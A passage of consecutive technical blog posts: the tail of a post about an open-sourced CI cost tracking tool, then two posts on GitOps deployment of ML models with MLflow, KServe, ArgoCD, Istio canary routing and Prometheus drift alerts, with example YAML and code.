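    print(monthly_cost(12, "linux", runs_per_day=500))
```

Decimal is used instead of float so that sub-cent amounts add up without rounding drift.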

The common patterns I see

After watching enough CI pipelines, a few patterns account for most of the waste:

Matrix explosions. A workflow that tests across 3 OS versions and 4 runtime versions runs 12 times per push. If the matrix was added incrementally over time, nobody may have thought through the cumulative cost.

macOS runners for non-macOS work. macOS runners cost 10x more than Linux. They're necessary for iOS builds and sometimes for Homebrew. They're not necessary for most backend services, but they show up there sometimes because someone copied a workflow template.

Test parallelism without caching. Running tests in parallel is good. Running them in parallel while re-downloading 200MB of dependencies on every run because the cache key is wrong is expensive.

Nightly builds that nobody needs. Workflows scheduled to run nightly that were set up to catch a specific class of bug that was fixed 18 months ago. The schedule never got cleaned up.

None of these are difficult to fix once you can see them. The problem is visibility.
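
The matrix pattern in particular is easy to quantify: the job count is the product of the dimension sizes. A minimal sketch, ignoring include and exclude rules; the matrix values are made-up examples.

```python
from math import prod


def matrix_jobs(matrix: dict[str, list]) -> int:
    """Number of jobs a build matrix expands to (no include/exclude handling)."""
    return prod(len(values) for values in matrix.values())


matrix = {
    "os": ["ubuntu-22.04", "ubuntu-24.04", "windows-2022"],
    "node": [18, 20, 22, 24],
}

if __name__ == "__main__":
    print(matrix_jobs(matrix))
    # Adding two more runtime versions multiplies the count instead of adding to it.
    print(matrix_jobs({**matrix, "node": [14, 16, 18, 20, 22, 24]}))
```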

Why it's now open source and free

I built this as a paid SaaS originally. The pricing was too restrictive for a product without an established reputation. If you're asking engineers to add a GitHub App to their organization and trust it with their CI data, "trust us, it's $29/month" is a hard sell when nobody's heard of you.

The honest version: the product was good and nobody knew about it. That's a distribution problem, not a product problem.

So the model is now simple. CICosts is MIT licensed, the code is on GitHub, and the hosted version at app.cicosts.dev is free with no usage limits. If your organization needs an SLA or wants a private deployment, that's the enterprise tier.

Getting started

Install it from GitHub:

https://github.com/phonotechnologies/cicosts-app
https://github.com/phonotechnologies/cicosts-api

Or use the hosted version directly at app.cicosts.dev. Add the GitHub App to your organization, and cost data starts flowing within a few minutes of your next workflow run.

The setup takes about five minutes. There's no code change required in your repos. The GitHub App receives webhook events automatically once installed.

What I'd do differently

If I were starting from zero, I'd make it open source from day one and focus entirely on getting the GitHub App installation experience right. The hardest part of a tool like this isn't the cost calculation. It's getting someone to trust it enough to install it.

Open source makes that easier. You can read the code. You can see exactly what data is being stored and what isn't. That matters when you're asking someone to add an app to their GitHub organization.

The code is on GitHub under the phonotechnologies organization. PRs welcome, especially around runner pricing updates and new alert types. If you run into something, open an issue.

GitOps for ML in 2026: Treat Your AI Models Like Microservices (Or Watch Them Drift Into Production Chaos)

Mateen Anjum — Sat, 14 Mar 2026 21:46:50 +0000

TL;DR: Apply the same GitOps discipline you use for application code to ML model deployments, and you get version history, rollback, and promotion gates that actually work, instead of the SSH-and-pray workflow most teams are still running.

The Problem

There's a model running in production right now that nobody on your team can explain. It was trained six weeks ago, deployed by someone who's since moved to a different team, and the only record of what version it is lives in a Slack message that's been buried under 4,000 other messages.

When it starts making bad predictions, what's your rollback plan? If your answer involves SSHing into a server, editing a config file by hand, and hoping the right weights get loaded, you're in the majority. That doesn't make it less of a disaster.

I spent the better part of last year helping platform teams get their ML deployment story straight. The pattern I kept seeing: teams had decent model training pipelines, reasonable experiment tracking in MLflow, and then a complete gap between "model registered" and "model serving traffic." The gap got filled with shell scripts, manual steps, and a whole lot of tribal knowledge.

The fix isn't a new tool. It's applying discipline you already have from application deployments to the model deployment layer.

Before we moved to GitOps for model deployments, a typical promotion cycle looked like this. A data scientist trains a new version, registers it in MLflow, then files a ticket. A platform engineer picks up the ticket, SSH-es into the model server, updates the model path, restarts the serving process, and manually validates that predictions look reasonable. Start to finish: 4 to 6 hours on a good day, longer when the engineer is in meetings or the server is being weird.

Rollback? There was no rollback. The best-case scenario was that someone remembered what the previous model path was.

What Most Teams Try First (And Why It Fails)

The first instinct is usually scripts. Someone writes a deploy.sh that takes a model version as an argument, connects to the serving infrastructure, and handles the update. This is better than pure manual steps, but it fails in a few predictable ways.

First, scripts don't have memory. You can run deploy.sh with model version 47, then run it again with version 51, and there's no audit trail of who ran what or why. When something goes wrong, you're back to grep-ing through logs and asking around.

Second, scripts don't handle promotion gates. You can't encode "this model can only go to production if it passed staging validation for 24 hours" in a shell script without it becoming a sprawling mess that nobody wants to maintain.

Third, and this one bites hardest: scripts assume the current state. If someone manually changes something on the serving infrastructure, your script has no way of detecting that drift. The next run might succeed or fail unpredictably depending on what changed and when.

MLflow solves the experiment tracking and model registry side well. You get version numbers, artifact storage in S3, stage transitions (Staging, Production), and a clean API. What MLflow doesn't give you is a Kubernetes-native way to declare "this cluster should be running model version 47 right now" and enforce that continuously.

That's where KServe and ArgoCD come in.

The Architecture

The full stack has six layers working together.

MLflow + S3 handle model artifacts. Every trained model version gets registered with MLflow, which stores the artifact URI pointing to a path in S3. The URI looks something like s3://ml-models-prod/fraud-detector/v47/model.pkl. MLflow's registry gives you a version number and stage metadata. The actual weights live in S3.

KServe InferenceService is the Kubernetes abstraction for serving. Instead of managing a Pod or Deployment by hand, you define an InferenceService custom resource that describes what model to load, from where, and how to scale. KServe handles the rest: downloading the artifact from S3, loading it into the serving framework (Triton, TorchServe, SKLearn Server), and exposing an HTTP endpoint.

Git holds the desired state. A values.yaml file in your repository specifies which model version each environment should run. Promoting from staging to production is a PR that bumps a version number. The PR is the change review, the approval gate, and the audit trail all at once.

ArgoCD reconciles the cluster to match what's in Git. When the PR merges, ArgoCD detects the change and applies the updated KServe InferenceService. If someone manually changes the InferenceService on the cluster, ArgoCD detects the drift and reverts it.

Istio manages traffic splitting. During canary promotion, a VirtualService routes 10% of traffic to the new model version while 90% continues to the stable version. If metrics look good after a soak period, you update the traffic weights and do a full cutover.

Prometheus collects serving metrics. Latency (p99 in particular), throughput, and prediction distribution histograms give you the signals needed to decide whether a canary is healthy or needs to be rolled back.
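
The drift detection that ArgoCD performs boils down to comparing the declared state with the live object. The sketch below illustrates the idea only and is not ArgoCD's actual diff algorithm; it checks just the fields declared in Git and ignores anything extra on the live object, such as status.

```python
def diff_state(desired: dict, live: dict, path: str = "") -> list[str]:
    """List dotted paths where the live object differs from the desired one."""
    drift = []
    for key, want in desired.items():
        here = f"{path}.{key}" if path else key
        have = live.get(key)
        if isinstance(want, dict):
            # Recurse, treating a missing or non-dict live value as empty.
            drift.extend(diff_state(want, have if isinstance(have, dict) else {}, here))
        elif have != want:
            drift.append(f"{here}: want {want!r}, have {have!r}")
    return drift
```

An empty list means the cluster matches Git; a non-empty one is what a reconciler would revert.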

The Workflow

Here's how a model promotion actually works end to end.

A data scientist trains a new model, evaluates it against the validation set, and if it passes threshold, registers it in MLflow:

import mlflow

with mlflow.start_run():
    mlflow.sklearn.log_model(model, "model")
    mlflow.log_metrics({"f1_score": 0.94, "auc": 0.97})
    run_id = mlflow.active_run().info.run_id

client = mlflow.tracking.MlflowClient()
model_uri = f"runs:/{run_id}/model"
mv = client.create_model_version("fraud-detector", model_uri, run_id)
# mv.version == "47"

That registration triggers a CI pipeline (GitHub Actions or Tekton, depending on your setup) that opens a pull request bumping the version in the dev environment's values file.

values.yaml structure:

environments:
  dev:
    model:
      name: fraud-detector
      version: "47"
      storageUri: "s3://ml-models-prod/fraud-detector/v47"
      resources:
        requests:
          cpu: "2"
          memory: "4Gi"
        limits:
          cpu: "4"
          memory: "8Gi"
      minReplicas: 1
      maxReplicas: 3

  staging:
    model:
      name: fraud-detector
      version: "45"
      storageUri: "s3://ml-models-prod/fraud-detector/v45"
      resources:
        requests:
          cpu: "2"
          memory: "4Gi"
        limits:
          cpu: "4"
          memory: "8Gi"
      minReplicas: 2
      maxReplicas: 5

  prod:
    model:
      name: fraud-detector
      version: "43"
      storageUri: "s3://ml-models-prod/fraud-detector/v43"
      resources:
        requests:
          cpu: "4"
          memory: "8Gi"
        limits:
          cpu: "8"
          memory: "16Gi"
      minReplicas: 5
      maxReplicas: 20
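
The version bump the CI pipeline makes to this file can be sketched in a few lines of Python. This is a minimal sketch, not the pipeline's actual code: bump_model_version is a hypothetical helper, and it assumes values.yaml has already been parsed into a plain dict by whatever YAML library you use.

```python
import copy


def bump_model_version(values, env, new_version, bucket="ml-models-prod"):
    """Return a copy of `values` with one environment pointed at `new_version`.

    Hypothetical helper: the dict layout mirrors the values.yaml shown above.
    """
    updated = copy.deepcopy(values)  # never mutate the caller's data
    model = updated["environments"][env]["model"]
    model["version"] = str(new_version)
    # Keep the artifact pointer in lockstep with the version field.
    model["storageUri"] = f"s3://{bucket}/{model['name']}/v{new_version}"
    return updated


values = {
    "environments": {
        "dev": {
            "model": {
                "name": "fraud-detector",
                "version": "46",
                "storageUri": "s3://ml-models-prod/fraud-detector/v46",
            }
        }
    }
}

bumped = bump_model_version(values, "dev", 47)
print(bumped["environments"]["dev"]["model"]["storageUri"])
```

Deriving storageUri from the version in one place means a PR can never bump one without the other.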

KServe InferenceService (stable):

apiVersion: serving.kserve.io/v1beta1
kind: InferenceService
metadata:
  name: fraud-detector
  namespace: ml-serving-prod
  annotations:
    argocd.argoproj.io/sync-wave: "1"
spec:
  predictor:
    serviceAccountName: kserve-s3-sa
    sklearn:
      storageUri: "s3://ml-models-prod/fraud-detector/v43"
      resources:
        requests:
          cpu: "4"
          memory: "8Gi"
        limits:
          cpu: "8"
          memory: "16Gi"
    minReplicas: 5
    maxReplicas: 20
    scaleTarget: 80
    scaleMetric: concurrency

KServe InferenceService (canary variant):

apiVersion: serving.kserve.io/v1beta1
kind: InferenceService
metadata:
  name: fraud-detector
  namespace: ml-serving-prod
  annotations:
    argocd.argoproj.io/sync-wave: "1"
spec:
  predictor:
    serviceAccountName: kserve-s3-sa
    sklearn:
      storageUri: "s3://ml-models-prod/fraud-detector/v47"
      resources:
        requests:
          cpu: "4"
          memory: "8Gi"
        limits:
          cpu: "8"
          memory: "16Gi"
    minReplicas: 1
    maxReplicas: 5
    canaryTrafficPercent: 10

ArgoCD ApplicationSet for multi-environment management:

apiVersion: argoproj.io/v1alpha1
kind: ApplicationSet
metadata:
  name: fraud-detector-serving
  namespace: argocd
spec:
  generators:
    - list:
        elements:
          - env: dev
            cluster: dev-cluster
            namespace: ml-serving-dev
          - env: staging
            cluster: staging-cluster
            namespace: ml-serving-staging
          - env: prod
            cluster: prod-cluster
            namespace: ml-serving-prod
  template:
    metadata:
      name: "fraud-detector-{{env}}"
    spec:
      project: ml-serving
      source:
        repoURL: https://github.com/org/ml-gitops
        targetRevision: HEAD
        path: "environments/{{env}}"
        helm:
          valueFiles:
            - values.yaml
      destination:
        name: "{{cluster}}"  # cluster names go in destination.name; destination.server expects an API server URL
        namespace: "{{namespace}}"
      syncPolicy:
        automated:
          prune: true
          selfHeal: true
        syncOptions:
          - CreateNamespace=true
          - RespectIgnoreDifferences=true

Istio VirtualService for canary traffic split:

apiVersion: networking.istio.io/v1beta1
kind: VirtualService
metadata:
  name: fraud-detector-vs
  namespace: ml-serving-prod
spec:
  hosts:
    - fraud-detector.ml-serving-prod.svc.cluster.local
  http:
    - match:
        - headers:
            x-canary:
              exact: "true"
      route:
        - destination:
            host: fraud-detector-predictor-canary
            port:
              number: 80
          weight: 100
    - route:
        - destination:
            host: fraud-detector-predictor-default
            port:
              number: 80
          weight: 90
        - destination:
            host: fraud-detector-predictor-canary
            port:
              number: 80
          weight: 10

After the PR merges to dev, ArgoCD picks up the change within 3 minutes (the default sync interval) and applies the updated InferenceService. The model downloads from S3, the serving pod comes up, and the endpoint starts responding. At this point you can run your automated evaluation suite against the dev endpoint.

Promoting to staging is another PR. A human reviews it, checks the dev evaluation results, and approves. Merge, ArgoCD syncs, done. Production promotion follows the same pattern but includes an additional step: the canary InferenceService gets deployed first with 10% traffic, and a GitHub Actions workflow monitors Prometheus metrics for a configured soak period (we use 2 hours for most models) before opening the full-cutover PR automatically.
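
The decision the soak workflow has to make at the end of the window can be sketched like this. It is an illustration under assumptions, not our actual workflow code: CanarySample and canary_verdict are hypothetical names, the samples are assumed to have been fetched from Prometheus already, and the default limits mirror the 500ms p99 and 1% error-rate thresholds used in this post's alert rules.

```python
from dataclasses import dataclass


@dataclass
class CanarySample:
    """One observation of the canary taken during the soak period."""
    p99_latency_s: float
    error_rate: float


def canary_verdict(samples, p99_limit_s=0.5, error_limit=0.01, min_samples=3):
    """Return "wait", "rollback", or "promote" for a list of samples.

    min_samples is an assumed guard so a single early reading cannot
    promote a canary on its own.
    """
    if len(samples) < min_samples:
        return "wait"
    for sample in samples:
        if sample.p99_latency_s > p99_limit_s or sample.error_rate > error_limit:
            return "rollback"
    return "promote"


healthy = [CanarySample(0.21, 0.001), CanarySample(0.25, 0.002), CanarySample(0.23, 0.0)]
print(canary_verdict(healthy))
```

A "promote" verdict is what would open the full-cutover PR; anything else leaves the traffic split alone or reverts it.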

Drift Detection

Prediction drift is the sneaky failure mode. The model is technically serving, latency looks fine, but the distribution of predictions has shifted because the input data changed. You won't catch this with a liveness probe.

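KServe's serving runtimes expose request metrics to Prometheus out of the box. Prediction-distribution metrics, such as the fraud_detector_prediction_mean gauge used in the rules that follow, are something your serving code has to export itself. With that in place, you define alerting rules that fire when the distribution deviates beyond a threshold from a recent baseline.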

Prometheus PrometheusRule for drift alerting:

apiVersion: monitoring.coreos.com/v1
kind: PrometheusRule
metadata:
  name: fraud-detector-drift
  namespace: ml-serving-prod
  labels:
    prometheus: kube-prometheus
    role: alert-rules
spec:
  groups:
    - name: fraud-detector.drift
      interval: 2m
      rules:
        - alert: PredictionDriftDetected
          expr: |
            abs(
              avg_over_time(fraud_detector_prediction_mean[10m])
              - avg_over_time(fraud_detector_prediction_mean[60m] offset 1d)
            ) > 0.15
          for: 10m
          labels:
            severity: warning
            model: fraud-detector
            env: prod
          annotations:
            summary: "Prediction distribution shift detected for fraud-detector"
            description: "Mean prediction shifted by {{ $value | humanizePercentage }} from yesterday's baseline. Check for input data schema changes."

        - alert: ModelLatencyHigh
          expr: |
            histogram_quantile(0.99,
              sum(rate(fraud_detector_request_duration_seconds_bucket[5m])) by (le)
            ) > 0.5
          for: 5m
          labels:
            severity: critical
            model: fraud-detector
            env: prod
          annotations:
            summary: "p99 latency above 500ms for fraud-detector"
            description: "p99 latency is {{ $value }}s. SLA threshold is 500ms."

        - alert: ModelErrorRateHigh
          expr: |
            sum(rate(fraud_detector_request_total{status_code=~"5.."}[5m]))
            /
            sum(rate(fraud_detector_request_total[5m])) > 0.01
          for: 5m
          labels:
            severity: critical
            model: fraud-detector
            env: prod
          annotations:
            summary: "Error rate above 1% for fraud-detector"
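
If PromQL isn't your first language, the PredictionDriftDetected expression boils down to the following arithmetic. This is a rough Python equivalent for reasoning about the threshold, not something that runs in the pipeline. prediction_drift is a hypothetical name, and the sample values are made up.

```python
from statistics import fmean


def prediction_drift(recent, baseline, threshold=0.15):
    """Compare the mean of recent predictions against a baseline window.

    Mirrors abs(avg(recent) - avg(baseline)) > threshold from the alert rule.
    Returns the absolute shift and whether it crosses the threshold.
    """
    shift = abs(fmean(recent) - fmean(baseline))
    return shift, shift > threshold


# Made-up numbers: yesterday's mean score was about 0.11, today's is about 0.32.
shift, drifted = prediction_drift([0.30, 0.32, 0.34], [0.10, 0.12, 0.11])
print(round(shift, 2), drifted)
```

Note that a mean can stay flat while the shape of the distribution changes, so treat this as a first-line signal rather than a complete drift test.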

When any of these alerts fire, AlertManager routes them to PagerDuty (or your alert routing of choice). The on-call engineer's first action is to check whether a canary is active. If it is, and the canary change is the most recent commit on main, rolling back is a revert and a push:

git revert --no-edit HEAD
git push origin main

ArgoCD detects the revert within 3 minutes and redeploys the previous InferenceService version. In practice, our rollbacks averaged 4 minutes from decision to stable serving.

Results

Metric	Before	After
Time to deploy new model version	4 to 6 hours	8 minutes to production canary
Rollback capability	None (manual rebuild)	`git revert`, avg 4 minutes
Drift detection time	6 hours (user reports)	15 minutes (automated alert)
Deployment audit trail	Slack messages	Full Git history with PR reviews
Environment parity	Best effort	Enforced via ApplicationSet
Config drift prevention	None	ArgoCD selfHeal

The number that surprised me most was the drift detection improvement. We caught a data schema change within 15 minutes on the new system. The same type of change previously went undetected for 6 hours before a user complaint surfaced it. That's not a monitoring win, it's a business outcome.

Lessons Learned

Start with the values.yaml contract. The shape of that file is the most important design decision you'll make. Get the team to agree on it before writing any ArgoCD config. Everything else follows from it.

Put S3 artifact URIs in the InferenceService spec, not MLflow stage names. MLflow stage names ("Production", "Staging") are mutable. If you reference a stage name in your InferenceService spec, two different model versions could map to the same stage name over time, and your Git history loses meaning. Reference the explicit S3 URI with the version number baked in.

selfHeal is non-negotiable. Turn it on in your ArgoCD sync policy. Without selfHeal, a manual kubectl edit on the InferenceService will drift silently and nobody will notice until it matters.

Canary soak time depends on your traffic volume. For a high-volume fraud model processing 50k requests per minute, 30 minutes of canary is enough to get statistically significant signal. For a low-volume model processing 100 requests per hour, 2 hours of canary at 10% gives you only 20 requests through the new version. Adjust accordingly, or route specific customers to the canary instead of random percentage splitting.
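
The arithmetic behind that advice is worth writing down, because it's easy to get the units wrong. Here's a small sketch. The function names are mine, and the 1,000-request target is only an example figure, not a statistical rule.

```python
def expected_canary_requests(requests_per_hour, soak_hours, canary_percent):
    """Requests the canary is expected to see during the soak window."""
    return requests_per_hour * soak_hours * canary_percent / 100


def soak_hours_needed(target_requests, requests_per_hour, canary_percent):
    """Soak duration needed for the canary to see `target_requests`."""
    return target_requests / (requests_per_hour * canary_percent / 100)


# High volume: 50k requests per minute, 30 minutes, 10% split.
high = expected_canary_requests(50_000 * 60, 0.5, 10)

# Low volume: 100 requests per hour, 2 hours, 10% split.
low = expected_canary_requests(100, 2, 10)

# How long the low-volume model would need to soak to see 1,000 requests.
hours = soak_hours_needed(1_000, 100, 10)

print(high, low, hours)
```

When the required soak time comes out in days, that's the signal to route specific customers to the canary instead of splitting by percentage.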

Model cold start affects canary rollouts. Large models take time to download from S3 and load into memory. A 2GB model on a cold node might take 3 to 4 minutes before it's ready to serve. Account for this in your readiness probe timeouts and don't let your monitoring system flag the canary as failing during the startup window.

Try It Yourself

The repository structure I've described looks like this:

ml-gitops/
├── environments/
│   ├── dev/
│   │   ├── values.yaml
│   │   └── templates/
│   │       ├── inference-service.yaml
│   │       └── virtual-service.yaml
│   ├── staging/
│   │   ├── values.yaml
│   │   └── templates/
│   └── prod/
│       ├── values.yaml
│       └── templates/
├── base/
│   ├── inference-service-template.yaml
│   └── prometheus-rules.yaml
└── applicationset.yaml

Prerequisites before you start:

Kubernetes cluster (1.28 or newer)
KServe 0.12 or newer installed
ArgoCD 2.9 or newer installed
Istio 1.20 or newer installed
MLflow tracking server accessible from the cluster
S3 bucket with appropriate IRSA or Workload Identity configured for KServe pods

The ArgoCD ApplicationSet in this post assumes a Helm-based templating approach where each environment folder contains a values.yaml and a templates directory with the InferenceService and VirtualService manifests. You could also use Kustomize overlays. The concepts are identical.

Start with dev only. Get one model version deploying cleanly through ArgoCD before adding staging and prod. Add the canary workflow only after the basic promotion gate is working reliably.

The jump from "it works in dev" to "it's reliable in prod" is mostly about the Prometheus alerting and the canary soak automation. Those two pieces are what make the system trustworthy enough for the team to stop second-guessing every deployment.

GitOps for ML Model Deployment: A Real Pipeline, Not a Toy Demo

Mateen Anjum — Sun, 08 Mar 2026 06:27:15 +0000

TL;DR: I replaced ad-hoc model deployments with a fully declarative GitOps pipeline using KServe and ArgoCD. Every model version lives in Git, every change goes through a PR, and rollbacks take one git revert.

The Problem

Every ML team I've worked with has the same dirty secret: their model deployments are snowflakes.

The Python script that "works on the data scientist's machine." The Slack message that says "hey can you deploy the new model." The SSH session into the GPU node that nobody documented. Meanwhile, the same team's microservices are humming along with ArgoCD, automated rollbacks, PR-gated deploys, full audit trails.

That gap is embarrassing, and it's completely unnecessary.

KServe got accepted into CNCF as an Incubating project in September 2025. The tooling to close this gap is mature enough for production. Here's what the actual problem looks like in practice:

Someone manually SSHes into a node and runs a deployment script. No record of what version went live.
A model update silently replaces the previous one. There's no rollback path.
Two data scientists think different model versions are running in staging. Both are right, sort of.
An incident happens. Nobody can tell what changed or when.

I've lived through all of these. The fix isn't a better runbook or more Slack discipline. It's treating model deployments the same way we treat application deployments.

What I Tried First (And Why It Failed)

Attempt 1: Wrapping deployments in shell scripts

The first instinct was to write a deploy_model.sh that calls kubectl apply with the right image tag. This is better than nothing, but it's not GitOps. The script lives somewhere, gets edited ad-hoc, and there's still no PR-gated workflow. The script is the new snowflake.

Attempt 2: Baking models into Docker images

The idea: train the model, package the weights into a Docker image, deploy the image via a normal Deployment. This works surprisingly well for small models under a few hundred MB. It breaks down fast when the model is 2GB or 14GB. Your Docker build times blow up, your registry costs climb, and now your CI pipeline is bottlenecked on model artifact size.

More importantly, you lose the semantic layer. Your Git history shows model:sha256-abc123 instead of fraud-detector/v2.5.0 sklearn 2 replicas 50 RPS target. The config and the artifact are fused. That's hard to review and harder to reason about.

Attempt 3: What actually worked

Separate the artifact from the config. The model weights live in S3 under versioned paths that are written once and never overwritten. Git holds the pointer and all the serving configuration. A Kubernetes controller keeps the cluster in sync with what Git says. That's it.

The Solution

The stack I use and recommend:

Layer	Tool	Why
Model serving	KServe v0.14+	Kubernetes-native CRD, multi-framework, built-in canary
GitOps controller	ArgoCD	Declarative sync, health checks, rollback
Model storage	S3	Versioned paths, treated as immutable
Model versioning	MLflow	Tracks lineage from training to deployment
Ingress	Istio	Traffic splitting for canary rollouts
Secrets	AWS IRSA	No credentials in Git, ever

KServe is the linchpin. It exposes a single InferenceService CRD that ArgoCD manages like any other Kubernetes resource.

Step 1: Install KServe

# cert-manager is a prerequisite
kubectl apply -f https://github.com/cert-manager/cert-manager/releases/download/v1.17.0/cert-manager.yaml

kubectl create ns kserve

helm install kserve-crd oci://ghcr.io/kserve/charts/kserve-crd \
  --version v0.14.1 \
  --namespace kserve

helm install kserve oci://ghcr.io/kserve/charts/kserve \
  --version v0.14.1 \
  --namespace kserve \
  --set kserve.controller.deploymentMode=RawDeployment

I use RawDeployment mode. It uses standard Kubernetes Deployments and Services instead of Knative, which means fewer moving parts, better compatibility with existing Prometheus and HPA setups, and no cold-start complexity on the critical path.

Step 2: Structure your Git repo

models/
├── base/
│   └── kustomization.yaml
├── fraud-detector/
│   ├── kustomization.yaml
│   ├── inference-service.yaml
│   └── service-account.yaml
├── image-classifier/
│   ├── kustomization.yaml
│   └── inference-service.yaml
└── overlays/
    ├── staging/
    │   └── kustomization.yaml
    └── production/
        └── kustomization.yaml

Kustomize overlays let you parameterize resource limits, replica counts, and model URIs per environment without duplicating YAML.

Step 3: Define the InferenceService

This is the core resource. Here's a real example for a scikit-learn fraud detection model stored in S3:

# models/fraud-detector/inference-service.yaml
apiVersion: serving.kserve.io/v1beta1
kind: InferenceService
metadata:
  name: fraud-detector
  namespace: ml-serving
  labels:
    app: fraud-detector
    team: ml-platform
    model-version: "2.4.1"
  annotations:
    serving.kserve.io/deploymentMode: RawDeployment
spec:
  predictor:
    minReplicas: 2
    maxReplicas: 10
    scaleTarget: 50
    scaleMetric: rps
    serviceAccountName: kserve-s3-sa
    model:
      modelFormat:
        name: sklearn
      storageUri: "s3://prod-ml-models/fraud-detector/v2.4.1"
      resources:
        requests:
          cpu: "500m"
          memory: "1Gi"
        limits:
          cpu: "2"
          memory: "4Gi"
      env:
        - name: SKLEARN_SERVER_WORKERS
          value: "2"

The storageUri is the version pointer. Bumping v2.4.1 to v2.5.0 and raising a PR is your deploy-new-model workflow.
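
Because the PR touches both the storageUri and the model-version label, it's easy for the two to fall out of step. A CI check along these lines can catch that. It is a sketch under assumptions: the helper names are hypothetical, the manifest is assumed to be parsed into a dict already, and the URI is assumed to end in a v-prefixed version segment as in the example above.

```python
def version_from_storage_uri(storage_uri):
    """Extract "2.4.1" from a URI ending in ".../v2.4.1"."""
    last_segment = storage_uri.rstrip("/").rsplit("/", 1)[-1]
    if not last_segment.startswith("v"):
        raise ValueError(f"no version segment in {storage_uri!r}")
    return last_segment[1:]


def label_matches_uri(manifest):
    """True when the model-version label agrees with the storageUri."""
    label = manifest["metadata"]["labels"]["model-version"]
    uri = manifest["spec"]["predictor"]["model"]["storageUri"]
    return label == version_from_storage_uri(uri)


manifest = {
    "metadata": {"labels": {"model-version": "2.4.1"}},
    "spec": {
        "predictor": {
            "model": {"storageUri": "s3://prod-ml-models/fraud-detector/v2.4.1"}
        }
    },
}
print(label_matches_uri(manifest))
```

Failing the PR when this returns False keeps the label trustworthy as a quick "what's running" answer.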

For GPU workloads:

# models/image-classifier/inference-service.yaml
apiVersion: serving.kserve.io/v1beta1
kind: InferenceService
metadata:
  name: image-classifier
  namespace: ml-serving
  labels:
    model-version: "1.3.0"
spec:
  predictor:
    minReplicas: 1
    maxReplicas: 4
    serviceAccountName: kserve-s3-sa
    model:
      modelFormat:
        name: pytorch
      storageUri: "s3://prod-ml-models/image-classifier/v1.3.0"
      runtimeVersion: "23.08-py3"
      resources:
        requests:
          cpu: "2"
          memory: "8Gi"
          nvidia.com/gpu: "1"
        limits:
          cpu: "4"
          memory: "16Gi"
          nvidia.com/gpu: "1"
    # nodeSelector is a pod-level field, so it sits under predictor, not model
    nodeSelector:
      accelerator: nvidia-a10g

Step 4: Wire up the S3 service account

Don't put AWS credentials in manifests. Use IRSA on EKS:

# models/fraud-detector/service-account.yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: kserve-s3-sa
  namespace: ml-serving
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456789012:role/kserve-model-reader

The IAM role needs s3:GetObject and s3:ListBucket on your model bucket. KServe's storage initializer picks up the IRSA token automatically.

Step 5: Create the ArgoCD Application

# argocd/apps/ml-models.yaml
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: ml-models
  namespace: argocd
  finalizers:
    - resources-finalizer.argocd.argoproj.io
spec:
  project: ml-platform
  source:
    repoURL: https://github.com/phonotech/ml-manifests
    targetRevision: main
    path: models/overlays/production
  destination:
    server: https://kubernetes.default.svc
    namespace: ml-serving
  syncPolicy:
    automated:
      prune: true
      selfHeal: true
    syncOptions:
      - CreateNamespace=true
      - RespectIgnoreDifferences=true
    retry:
      limit: 5
      backoff:
        duration: 5s
        factor: 2
        maxDuration: 3m
  ignoreDifferences:
    - group: serving.kserve.io
      kind: InferenceService
      jsonPointers:
        - /status
        - /metadata/annotations/serving.kserve.io~1deploymentMode

The ignoreDifferences block is critical. KServe's controller writes back to the InferenceService status and some annotations. Without it, ArgoCD will perpetually detect drift and attempt to re-sync, creating a noisy feedback loop.
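
The ~1 in that last jsonPointers entry trips people up. It's JSON Pointer escaping (RFC 6901): a "/" inside a key is written as ~1, and a literal "~" as ~0. A tiny helper shows the rule. The function names are mine, for illustration only.

```python
def escape_pointer_token(token):
    """Escape one JSON Pointer reference token per RFC 6901."""
    # Order matters: escape "~" first so the "~1" we add is not re-escaped.
    return token.replace("~", "~0").replace("/", "~1")


def json_pointer(*tokens):
    """Join already-split path tokens into a JSON Pointer string."""
    return "".join("/" + escape_pointer_token(token) for token in tokens)


pointer = json_pointer("metadata", "annotations", "serving.kserve.io/deploymentMode")
print(pointer)
```

If you add more annotation keys to ignoreDifferences later, the same escaping applies to each of them.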

Step 6: The deployment workflow

Here's what a model update looks like end to end:

Data scientist trains a new model, registers the artifact in MLflow, uploads weights to s3://prod-ml-models/fraud-detector/v2.5.0/
They open a PR updating storageUri and the model-version label in inference-service.yaml
PR gets reviewed and merged to main
ArgoCD detects the diff within 3 minutes (or immediately with webhooks), syncs the new InferenceService spec
KServe's storage initializer pulls the new weights into the pod
New revision comes up healthy, traffic cuts over

The model version is in Git history. You can git revert it. You can see exactly what changed between v2.4.1 and v2.5.0 in the PR diff.

To trigger an ArgoCD sync immediately from GitHub Actions, call the ArgoCD API:

# .github/workflows/sync-models.yaml
name: Notify ArgoCD on model manifest change
on:
  push:
    branches: [main]
    paths:
      - 'models/**'

jobs:
  sync:
    runs-on: ubuntu-latest
    steps:
      - name: Trigger ArgoCD sync
        run: |
          curl -sS --fail -X POST \
            -H "Authorization: Bearer ${{ secrets.ARGOCD_TOKEN }}" \
            https://argocd.internal.ca/api/v1/applications/ml-models/sync

Canary rollouts

KServe's built-in canary support is where this pattern earns its keep.

# Step 1: Deploy canary at 10% traffic
apiVersion: serving.kserve.io/v1beta1
kind: InferenceService
metadata:
  name: fraud-detector
  namespace: ml-serving
spec:
  predictor:
    canaryTrafficPercent: 10
    model:
      modelFormat:
        name: sklearn
      storageUri: "s3://prod-ml-models/fraud-detector/v2.5.0"
      resources:
        requests:
          cpu: "500m"
          memory: "1Gi"

KServe automatically routes 90% to the last stable revision and 10% to v2.5.0. If the new model performs well, merge another PR bumping canaryTrafficPercent to 50, then promote to 100 by removing the field. If the canary is bad, set canaryTrafficPercent: 0 to pin back to stable immediately.
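
The promotion ladder described above is small enough to write as a function, which is handy if you want a bot to open the follow-up PRs. This is a sketch of the 10, 50, then remove-the-field sequence from this post. next_canary_percent is a hypothetical name, and the health signal is assumed to come from your own metrics.

```python
def next_canary_percent(current, healthy):
    """Return the next canaryTrafficPercent value for the PR.

    Returns 0 to pin traffic back to the stable revision, 50 for the
    middle step, or None to mean "remove the field" (full promotion).
    """
    if not healthy:
        return 0
    if current < 50:
        return 50
    return None


print(next_canary_percent(10, healthy=True))
print(next_canary_percent(50, healthy=True))
print(next_canary_percent(10, healthy=False))
```

Using None for full promotion keeps "remove the field" distinct from "set it to 100", which is how the post describes the final step.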

canaryTrafficPercent relies on Knative revisions, so it only takes effect in Serverless mode. In RawDeployment mode, you handle canary at the Istio level:

# istio/virtualservice-fraud-detector.yaml
apiVersion: networking.istio.io/v1beta1
kind: VirtualService
metadata:
  name: fraud-detector
  namespace: ml-serving
spec:
  hosts:
